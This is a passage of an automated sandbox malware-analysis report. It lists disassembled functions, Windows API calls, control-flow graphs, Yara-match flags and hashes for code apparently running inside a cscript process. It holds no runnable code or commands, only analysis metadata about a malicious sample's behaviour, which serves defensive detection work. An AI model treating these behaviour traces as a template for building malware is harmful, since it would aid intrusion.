                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d240d28b90e1117661ef53e5b7671781a0f8c2129992a40009be141a62350b3e
                                                      • Instruction ID: e06e4dfdb8db10953dfb5ae85a4668f5454814d5f1755bbff446554bfaf50291
                                                      • Opcode Fuzzy Hash: d240d28b90e1117661ef53e5b7671781a0f8c2129992a40009be141a62350b3e
                                                      • Instruction Fuzzy Hash: 5990027220180402F140715944047560005CBD0305F55D051A5065655E875DDED67665
                                                      Function 04BD2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
                                                      • Instruction ID: b549f27219203a72adb52f0d67a63b1fed48af6ed52807bb8fa2cd91582fb9f6
                                                      • Opcode Fuzzy Hash: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
                                                      • Instruction Fuzzy Hash: B6900222211C0042F20075694C14B170005CBD0307F55D155A0155655CCA19D9626521
                                                      Function 04BD2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
                                                      • Instruction ID: 1a047a3daa8a1b54f750421a55bf7cd403f569607573c549cce85c26b53e07ac
                                                      • Opcode Fuzzy Hash: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
                                                      • Instruction Fuzzy Hash: 7590026234180442F10071594414B160005CBE1305F55D055E1065655D871DDD537126
                                                      Function 04BD2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
                                                      • Instruction ID: f143598ae6e0d91e5bbe7e8ea79f2193450d5c637d67b452eb7f8c01345b9f8c
                                                      • Opcode Fuzzy Hash: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
                                                      • Instruction Fuzzy Hash: 09900226211800032105B55907045170046CBD5355355D061F1016651CD725D9626121
                                                      Function 04BD2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
                                                      • Instruction ID: bf2833956bff9d013a3cee391551769fbcc8c516693fc321fa74e51c83c072ce
                                                      • Opcode Fuzzy Hash: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
                                                      • Instruction Fuzzy Hash: 6B90023220180802F1807159440465A0005CBD1305F95D055A0026755DCB19DB5A77A1
                                                      Function 04BD2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
                                                      • Instruction ID: 170cb2e7530c5551192da86db247e2b0f2d258f55fed4a628ed139aec81cbf62
                                                      • Opcode Fuzzy Hash: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
                                                      • Instruction Fuzzy Hash: 1090023220584842F14071594404A560015CBD0309F55D051A0065795D9729DE56B661
                                                      Function 04BD2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
                                                      • Instruction ID: 16ef8481e581543ef4db02415191411f2fc8254ee9c03b2254c2171b048063d7
                                                      • Opcode Fuzzy Hash: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
                                                      • Instruction Fuzzy Hash: 9E90026220280003610571594414626400ACBE0205B55D061E1015691DC629D9927125
                                                      Function 04BD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
                                                      • Instruction ID: 5d149983497a77deace508264920a5dbdc61d1331ca5d171ed68536f4b847a4d
                                                      • Opcode Fuzzy Hash: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
                                                      • Instruction Fuzzy Hash: C290023260590402F100715945147161005CBD0205F65D451A0425669D8799DA5275A2
                                                      Function 027C9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 402 27c9080-27c90c2 call 27cbd40 405 27c919c-27c91a2 402->405 406 27c90c8-27c9118 call 27cbe10 call 27bace0 call 27c4e40 402->406 413 27c9120-27c9131 Sleep 406->413 414 27c9196-27c919a 413->414 415 27c9133-27c9139 413->415 414->405 414->413 416 27c913b-27c9161 call 27c8ca0 415->416 417 27c9163-27c9183 415->417 419 27c9189-27c918c 416->419 417->419 420 27c9184 call 27c8eb0 417->420 419->414 420->419
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 027C9128
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 2a96c00c4c44193a417debe4a735e66252686fc8cee66195dde0c52a592a4e34
                                                      • Instruction ID: 1bf049c9d314082a396e0141e0137dcb4645f8aa4680ea771f4544d6534ed60d
                                                      • Opcode Fuzzy Hash: 2a96c00c4c44193a417debe4a735e66252686fc8cee66195dde0c52a592a4e34
                                                      • Instruction Fuzzy Hash: 8F318FB2500644FBC724DF74C889FB7B7B9EB48B04F20811DF62A5B244D630B610CBA8
                                                      Function 027C9076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 422 27c9076-27c90c2 call 27cbd40 426 27c919c-27c91a2 422->426 427 27c90c8-27c9118 call 27cbe10 call 27bace0 call 27c4e40 422->427 434 27c9120-27c9131 Sleep 427->434 435 27c9196-27c919a 434->435 436 27c9133-27c9139 434->436 435->426 435->434 437 27c913b-27c9161 call 27c8ca0 436->437 438 27c9163-27c9183 436->438 440 27c9189-27c918c 437->440 438->440 441 27c9184 call 27c8eb0 438->441 440->435 441->440
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 027C9128
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 2e80dbdf15315df68432b7ff82cbe34a9a6752b3945dd384bf50107b656763b8
                                                      • Instruction ID: 87c7dc38262a7ef7b3a119b104f31c2cce78c3574ba72ea19e8c30f16c8dcc21
                                                      • Opcode Fuzzy Hash: 2e80dbdf15315df68432b7ff82cbe34a9a6752b3945dd384bf50107b656763b8
                                                      • Instruction Fuzzy Hash: 5731BFB2900205EBC714EF74C889BB7B7B9FB88B04F20801DE6296B245D774A510CBA5
                                                      Function 027CA662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 549 27ca662-27ca686 550 27ca68c-27ca6a1 RtlFreeHeap 549->550 551 27ca687 call 27caf60 549->551 551->550
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027B3AF8), ref: 027CA69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 74d4561dbcc0763568b1af58ac35c0eda121a2fdf7d59f089cd1022ee91f2774
                                                      • Instruction ID: 23d463003ed5a97c82c63236c3de20acf9198e889684b490ba594dfa0a2969d4
                                                      • Opcode Fuzzy Hash: 74d4561dbcc0763568b1af58ac35c0eda121a2fdf7d59f089cd1022ee91f2774
                                                      • Instruction Fuzzy Hash: 19E06DB22046096BD718DF68DC48EE73759EF89361F108249F9599B681C630E800CAB0
                                                      Function 027CA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 552 27ca670-27ca6a1 call 27caf60 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027B3AF8), ref: 027CA69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: 38e03c0b728c311ed361da81edd71de772a834bae4924b39b08be4c75da7cb68
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: C4E046B2200208ABDB18EFA9CC48EA777ADEF88750F118558FE085B241C630F910CAF0
                                                      Function 027B8309 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 555 27b8309-27b831f 556 27b8328-27b835a call 27cca00 call 27bace0 call 27c4e40 555->556 557 27b8323 call 27cbe60 555->557 564 27b838e-27b8392 556->564 565 27b835c-27b836e PostThreadMessageW 556->565 557->556 566 27b838d 565->566 567 27b8370-27b838b call 27ba470 PostThreadMessageW 565->567 566->564 567->566
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027B836A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027B838B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: eeb613ea36ea60d520cd56ddb5d2f000dc3bc4b8d6e3dc59503c010226b12c97
                                                      • Instruction ID: 9d63147205abd5e68a9484e6dd2a0ee279c9059d1eea542469b66bc2553d9724
                                                      • Opcode Fuzzy Hash: eeb613ea36ea60d520cd56ddb5d2f000dc3bc4b8d6e3dc59503c010226b12c97
                                                      • Instruction Fuzzy Hash: 1D01F571A8026877E722A6A49C06FEE772C9F00B40F15015CFB04BB1C1E694690547F6
                                                      Function 027B8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027B836A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027B838B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 771e945eaf44c58c09e6e8022cf52cf1e63edbb019fba50a3acfb0f830fc6881
                                                      • Instruction ID: 747780527034d85f03480bb14e18dc24dfc0cb2836980fa11a9ee3b53e753b3d
                                                      • Opcode Fuzzy Hash: 771e945eaf44c58c09e6e8022cf52cf1e63edbb019fba50a3acfb0f830fc6881
                                                      • Instruction Fuzzy Hash: 3901F271A8022877E722A6A48C06FFE772CAF00B90F14011CFF04BB1C0E6A469064BF6
                                                      Function 027BACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027BAD52
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                                      • Instruction ID: ec389617426aa5e151f255a88ca3e8832a56baab51f62c79569d4af37e06ebf4
                                                      • Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                                      • Instruction Fuzzy Hash: 20011AB5E0020DABDF11EAA5DC45FEEB3B99F54308F1045A9E90897244FA31EB58CB91
                                                      Function 027CA6DD Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027CA734
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 5cd89c79da36369d6393ffab14f4cde6b9d887972bfa7ca1f7fc0148ee0cec1a
                                                      • Instruction ID: e78f527636ca014c6ae3fc507c721cc8f489095c380307996754e4d4644a9b4f
                                                      • Opcode Fuzzy Hash: 5cd89c79da36369d6393ffab14f4cde6b9d887972bfa7ca1f7fc0148ee0cec1a
                                                      • Instruction Fuzzy Hash: CD01AFB2214108ABCB58DF89DC80EEB37ADAF8C754F158258BA0D97241D630E851CBA0
                                                      Function 027CA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027CA734
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: 9b047100c10a6f6bdb39618fcae72a8ef43251a6e2238972cb4d85b60f6804fe
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: 4701B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                      Function 027C91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,027BF040,?,?,00000000), ref: 027C91EC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 28eccb79df0e10068518ffd8764fd46980ccd1d76a7d28284f7ef74cdef37d2e
                                                      • Instruction ID: ef1d74c8960da70d57320befa540332598e3a57133e90c500521845dbe9bfc8d
                                                      • Opcode Fuzzy Hash: 28eccb79df0e10068518ffd8764fd46980ccd1d76a7d28284f7ef74cdef37d2e
                                                      • Instruction Fuzzy Hash: 58E06D733812043BE22065A9AC02FA7B39D8B81B20F25002EFB0DEB2C0D995F40146A5
                                                      Function 027CA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(027C4526,?,027C4C9F,027C4C9F,?,027C4526,?,?,?,?,?,00000000,00000000,?), ref: 027CA65D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction ID: a7c2a97149f12cbc286576604be2be0141d6023bd26936ddee47d63eff4cd0ef
                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction Fuzzy Hash: BDE046B2200208ABDB14EF99CC44EA777ADEF88754F218558FE085B241C630F910CBF0
                                                      Function 027CA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,027BF1C2,027BF1C2,?,00000000,?,?), ref: 027CA800
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: 71d4e850261137a53e2dee8facf3e1af5f848002e2eb8ad6329b74a798783d47
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: B3E01AB12002086BDB10DF59CC84EE737ADEF89750F118158BA0857241C930E8108BF5
                                                      Function 027BF6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,027B8D14,?), ref: 027BF6EB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                                                      • Instruction ID: b634263dc96964a30799ce26777880f044ce2af5d4f0928145d1b7efbe1a2095
                                                      • Opcode Fuzzy Hash: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                                                      • Instruction Fuzzy Hash: 27D05E726503042BE610BAB49C16F6632895B44B04F490068F948972C3D954E4004565
                                                      Function 04BD2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
                                                      • Instruction ID: 2a677419ddc8b52210f05f62f785dcee1e4ccfc2f2ce27213d7538903df515f8
                                                      • Opcode Fuzzy Hash: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
                                                      • Instruction Fuzzy Hash: 3FB09B729019C5C5FB15F76046087177900EBD0705F19C0E1D2030742E473CD5D1F275

                                                      Non-executed Functions

                                                      Function 0062AADC Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 295librarystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserDefaultLCID.KERNEL32 ref: 0062AAFD
                                                        • Part of subcall function 0062AB35: GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,00000000,?,0062AB0C), ref: 0062AB4B
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00630D32
                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005), ref: 00630D4B
                                                      • LoadStringA.USER32(000003E9,?,00000104), ref: 00630D6D
                                                      • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00630DA5
                                                      • memcpy.MSVCRT ref: 00630E0E
                                                      • strcpy_s.MSVCRT ref: 00630E28
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00630E3D
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00630E55
                                                      Strings
                                                      Memory Dump Source
